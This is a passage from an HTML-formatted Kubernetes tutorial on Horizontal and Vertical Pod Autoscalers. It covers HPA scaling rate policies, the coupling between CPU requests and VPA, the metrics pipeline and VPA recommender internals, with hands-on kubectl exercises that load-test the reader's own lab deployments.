&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Failure mode&lt;/td&gt;
&lt;td&gt;Under-scaling (HPA reacts too late)&lt;/td&gt;
&lt;td&gt;Over-scaling (transient metric spikes)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CPU is safer to configure but slower to react and couples badly with VPA. RPS is faster and decoupled, but requires a functioning metrics pipeline and careful target setting. Production systems often blend both — RPS as the primary signal with a CPU ceiling to catch cases where the metrics pipeline has a gap.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: VPA is a Batch System Disguised as Real-Time&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;VPA reacts on a timescale of minutes to hours, applies changes via pod restarts, and builds recommendations from historical data. Treat it as an &lt;strong&gt;offline optimizer&lt;/strong&gt; that runs continuously in the background — not a real-time controller. Its job is to right-size pods between load cycles, not to respond to them.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  HPA v2 Scaling Policies
&lt;/h3&gt;

&lt;p&gt;A commonly overlooked feature of &lt;code&gt;autoscaling/v2&lt;/code&gt; is &lt;strong&gt;scaling rate policies&lt;/strong&gt;. These cap how fast replica counts can change, and in practice they are more important than stabilization windows for protecting downstream systems from traffic amplification during burst scale-out:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;behavior&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;scaleUp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;100&lt;/span&gt;        &lt;span class="c1"&gt;# at most double replicas per period&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pods&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4&lt;/span&gt;          &lt;span class="c1"&gt;# or add at most 4 pods per period&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
    &lt;span class="na"&gt;selectPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Min&lt;/span&gt;   &lt;span class="c1"&gt;# use whichever is more conservative&lt;/span&gt;
  &lt;span class="na"&gt;scaleDown&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;120&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without explicit policies, a sudden load spike can cause HPA to jump from 3 to 50 replicas in a single sync cycle. Rate-limiting scale-out smooths the curve and gives downstream dependencies time to adapt.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 3: Observe Unconstrained vs. Rate-Limited Scale-Out
&lt;/h3&gt;

&lt;p&gt;This exercise demonstrates why scaling rate policies matter. You'll compare the replica jump with and without a &lt;code&gt;Pods&lt;/code&gt; rate cap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy a fresh workload with low CPU requests (makes it easy to saturate)&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment rate-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment rate-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100m
kubectl expose deployment rate-test &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80
kubectl scale deployment rate-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Create an HPA without rate policies&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: rate-test
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: rate-test
  minReplicas: 2
  maxReplicas: 20
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 30
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Blast it with load and watch the replica jump&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run 5 parallel load generators&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://rate-test; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Watch replicas — note the size of the jump&lt;/span&gt;
kubectl get hpa rate-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 4: Kill load, reset, and add a rate policy&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-1 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-2 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-3 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-4 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-5 2&amp;gt;/dev/null &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true
&lt;/span&gt;&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done
&lt;/span&gt;kubectl scale deployment rate-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2

&lt;span class="c"&gt;# Now patch the HPA with a rate cap&lt;/span&gt;
kubectl patch hpa rate-test &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  behavior:
    scaleUp:
      policies:
      - type: Pods
        value: 2
        periodSeconds: 30
      selectPolicy: Min'&lt;/span&gt;

&lt;span class="c"&gt;# Re-run the same load burst&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://rate-test; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done

&lt;/span&gt;kubectl get hpa rate-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; With no policy, replicas may jump 2→10+ in a single cycle. With the 2-pods-per-30s cap, the scale-out is gradual. Neither is always "better" — this illustrates the tradeoff between responsiveness and stability.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done
&lt;/span&gt;kubectl delete deployment rate-test
kubectl delete hpa rate-test
kubectl delete svc rate-test
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The CPU Request Coupling Problem (Why VPA Breaks CPU HPA)
&lt;/h3&gt;

&lt;p&gt;This is the most architecturally significant HPA pitfall that teams consistently miss. CPU utilization in HPA is computed &lt;strong&gt;relative to the pod's requested CPU&lt;/strong&gt;, not actual node capacity:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cpuUtilization = currentCPUUsage / requestedCPU
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates direct coupling between resource requests and scaling behavior. If you over-request CPU (e.g., &lt;code&gt;requests: 2000m&lt;/code&gt; for a service that realistically uses 400m), computed utilization is suppressed — HPA sees a low percentage and refuses to scale out even under genuine load. Conversely, under-requesting CPU inflates utilization and causes premature scale-out.&lt;/p&gt;

&lt;p&gt;This is why VPA and HPA must be used together carefully: VPA continuously adjusts &lt;code&gt;requests&lt;/code&gt;, which directly shifts HPA's utilization baseline. Run them on separate metrics or you get a feedback loop.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 4: Demonstrate CPU Request Coupling
&lt;/h3&gt;

&lt;p&gt;This exercise shows how the same real CPU usage produces different HPA behavior depending on the resource request value.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy with a very high CPU request (simulates over-provisioning)&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment coupling-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="c"&gt;# Set a deliberately inflated CPU request&lt;/span&gt;
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment coupling-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2000m

kubectl expose deployment coupling-test &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: coupling-test
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: coupling-test
  minReplicas: 1
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Generate load and observe the HPA metric value&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl run load-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://coupling-test; done"&lt;/span&gt;

&lt;span class="c"&gt;# Watch — the CPU utilization % will be much lower than real usage&lt;/span&gt;
&lt;span class="c"&gt;# because it's divided by the 1000m request&lt;/span&gt;
kubectl get hpa coupling-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;span class="c"&gt;# In another terminal:&lt;/span&gt;
kubectl top pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;coupling-test
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Reset with a realistic request and observe the difference&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod load-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl scale deployment coupling-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1

&lt;span class="c"&gt;# Now set a realistic (low) CPU request&lt;/span&gt;
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment coupling-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;500m

&lt;span class="c"&gt;# Force pod restart to pick up new requests&lt;/span&gt;
kubectl rollout restart deployment coupling-test

&lt;span class="c"&gt;# Re-run load&lt;/span&gt;
kubectl run load-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://coupling-test; done"&lt;/span&gt;

kubectl get hpa coupling-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
kubectl top pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;coupling-test
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The same real CPU usage produces a dramatically different utilization percentage depending on the request. With &lt;code&gt;1000m&lt;/code&gt; request, HPA may show 15-20% and not scale. With &lt;code&gt;100m&lt;/code&gt; request, the same workload shows 150-200%+ and triggers aggressive scale-out. &lt;strong&gt;This is exactly the feedback loop that emerges when VPA adjusts requests while CPU-based HPA is running.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod load-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete deployment coupling-test
kubectl delete hpa coupling-test
kubectl delete svc coupling-test
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Metrics Pipeline
&lt;/h3&gt;

&lt;p&gt;HPA talks to one of three metrics APIs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;metrics.k8s.io&lt;/code&gt;&lt;/strong&gt; — Resource metrics (CPU/memory) served by &lt;code&gt;metrics-server&lt;/code&gt;, which scrapes kubelet's Summary API at ~15s resolution. End-to-end metric freshness (scrape + aggregation + HPA sync cycle) still introduces meaningful lag of 30–60s under normal conditions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;custom.metrics.k8s.io&lt;/code&gt;&lt;/strong&gt; — Arbitrary per-object metrics. Backed by adapters like Prometheus Adapter or Datadog Cluster Agent.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;external.metrics.k8s.io&lt;/code&gt;&lt;/strong&gt; — Metrics external to the cluster (queue depths, SQS, etc).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F564jscnlitjg2ui1apvc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F564jscnlitjg2ui1apvc.png" alt="image" width="800" height="237"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The latency consequence&lt;/strong&gt;: CPU-based HPA reacts to load that has already materialized. For latency-sensitive services, augment with external or custom metrics that reflect current load (active connections, queue depth, RPS) rather than CPU, which lags by the full pipeline round-trip.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Scale-to-Zero
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;minReplicas&lt;/code&gt; defaults to 1 but can be set to 0 in &lt;code&gt;autoscaling/v2&lt;/code&gt;. However, CPU-based scaling cannot recover from zero — there are no pods to report metrics. Scale-to-zero is only viable with external or object metrics, where the metric source exists independently of pod count. In practice, KEDA is the standard solution, as it manages the activator component needed to bridge the zero-to-one cold-start gap.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Vertical Pod Autoscaler (VPA)
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Architecture: Three Separate Components
&lt;/h3&gt;

&lt;p&gt;Unlike HPA (a single controller loop), VPA is split into three distinct processes with distinct responsibilities and failure modes:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmb42ldwaww2b3t3me7cp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmb42ldwaww2b3t3me7cp.png" alt="image" width="800" height="991"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 5: Install VPA and Observe Recommendations
&lt;/h3&gt;

&lt;p&gt;Install the VPA components and run it in &lt;code&gt;Off&lt;/code&gt; mode first — as a pure recommendation engine, with no evictions. This is the safest first step for any production environment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Install VPA from the official repo&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/kubernetes/autoscaler.git /tmp/autoscaler
&lt;span class="nb"&gt;cd&lt;/span&gt; /tmp/autoscaler/vertical-pod-autoscaler

&lt;span class="c"&gt;# Install CRDs and components&lt;/span&gt;
./hack/vpa-up.sh

&lt;span class="c"&gt;# Verify all 3 components are running&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system | &lt;span class="nb"&gt;grep &lt;/span&gt;vpa
&lt;span class="c"&gt;# Expect: vpa-admission-controller, vpa-recommender, vpa-updater&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Deploy a workload to monitor&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: hamster
spec:
  replicas: 2
  selector:
    matchLabels:
      app: hamster
  template:
    metadata:
      labels:
        app: hamster
    spec:
      containers:
      - name: hamster
        image: registry.k8s.io/ubuntu-slim:0.14
        resources:
          requests:
            cpu: 100m
            memory: 50Mi
        command: ["/bin/sh"]
        args:
        - "-c"
        - "while true; do timeout 0.5s yes &amp;gt;/dev/null; sleep 0.5s; done"
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Create a VPA in &lt;code&gt;Off&lt;/code&gt; mode (recommendation only)&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: hamster-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: hamster
  updatePolicy:
    updateMode: "Off"
  resourcePolicy:
    containerPolicies:
    - containerName: hamster
      minAllowed:
        cpu: 50m
        memory: 50Mi
      maxAllowed:
        cpu: 2
        memory: 1Gi
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 4: Wait ~5 minutes for recommendations to populate, then inspect&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Poll until recommendations appear&lt;/span&gt;
kubectl get vpa hamster-vpa &lt;span class="nt"&gt;--watch&lt;/span&gt;

&lt;span class="c"&gt;# When RECOMMENDED shows values, describe for full detail&lt;/span&gt;
kubectl describe vpa hamster-vpa
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The &lt;code&gt;status.recommendation.containerRecommendations&lt;/code&gt; section shows &lt;code&gt;lowerBound&lt;/code&gt;, &lt;code&gt;target&lt;/code&gt;, and &lt;code&gt;upperBound&lt;/code&gt; for both CPU and memory. Compare these against your manifest's requests. The gap is your rightsizing debt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key things to note:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The memory recommendation is likely much higher than &lt;code&gt;50Mi&lt;/code&gt; (processes have real overhead)&lt;/li&gt;
&lt;li&gt;The CPU recommendation may differ significantly from &lt;code&gt;100m&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;These are updated continuously as the workload runs&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Recommender: Statistical Core
&lt;/h3&gt;

&lt;p&gt;The Recommender maintains an in-memory histogram of CPU and memory usage per container, modeled as a &lt;strong&gt;decay-weighted percentile estimator&lt;/strong&gt;. Older samples are down-weighted exponentially, giving more influence to recent behavior while retaining long-tail signal.&lt;/p&gt;

&lt;p&gt;The histogram uses &lt;strong&gt;exponential bucket boundaries&lt;/strong&gt; — each bucket is ~10% wider than the previous, enabling compact representation across orders of magnitude of resource values.&lt;/p&gt;

&lt;p&gt;Two important asymmetries in how CPU and memory are modeled:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory uses peak samples&lt;/strong&gt;, not averages. Since memory is not compressible (a process that allocates 2GB cannot be throttled down to 1GB without an OOMKill), the Recommender intentionally biases toward observed peaks rather than typical usage. This makes memory recommendations more conservative than CPU by design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CPU recommendations smooth over bursts&lt;/strong&gt;. CPU is compressible — throttling slows a process but doesn't kill it. The recommender uses a smoother model for CPU, accepting that brief spikes will be throttled rather than sizing for them. However, this creates a blind spot: &lt;strong&gt;if CPU limits are enforced aggressively, throttling suppresses the observed usage signal&lt;/strong&gt;, making VPA's histogram reflect artificially low CPU consumption. The Recommender cannot distinguish "this container uses 200m" from "this container is throttled at 200m." If you see VPA recommending low CPU while your application has high p99 latency, check &lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; before trusting the recommendation.&lt;/p&gt;

&lt;p&gt;Key estimation parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Target percentile&lt;/strong&gt;: CPU recommended at p90 of observed usage; memory at p95. Both are configurable.&lt;/li&gt;
&lt;li&gt;
